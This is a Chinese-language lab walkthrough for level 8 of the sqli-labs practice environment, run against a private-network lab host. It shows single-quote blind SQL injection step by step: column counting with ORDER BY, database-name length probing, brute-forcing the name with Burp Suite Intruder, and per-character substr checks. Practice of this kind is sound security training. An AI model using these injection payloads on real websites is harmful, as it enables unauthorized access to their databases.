第八关
基于单引号的盲注
1.判断注入点
根据提示加单引号 http://192.168.3.122:82/Less-8/?id=1' --+2.爆列数
http://192.168.3.122:82/Less-8/?id=1' order by 3 --+
在order by 4 时不显示,判断列数为3
3.查数据库长度
http://192.168.3.122:82/Less-8/?id=1' and length(database())=8 --+
得到数据库长度为8
4.爆库,使用burpsuit进行爆库,已知库长度为8,随便输入8个字母
http://192.168.3.122:82/Less-8/?id=1' and database()='aaaaaaaa' %23
Burpsuit设置好代理,我设置为127.0.0.1:8080
把代理的选项点成拦截请求,抓包
右键发送给intruder(测试器)
在测试器窗口下先点击清除按钮
再aaaaaaaa两侧点击添加按钮
然后在有效载荷里面选择密码
点击开始攻击,完成后点击长,显示不同长度的即为库名:security
http://192.168.3.122:82/Less-8/?id=1' and database()='security' %23 ,验证成功
http://192.168.3.122:82/Less-8/?id=1’ and substr(database(),1,1)=’s’%23
http://192.168.3.122:82/Less-8/?id=1’ and substr(database(),2,1)=’e’%23
字母一个一个判断(费力),推荐用sqlmap,下一篇文章讲如何安装与使用sqlmap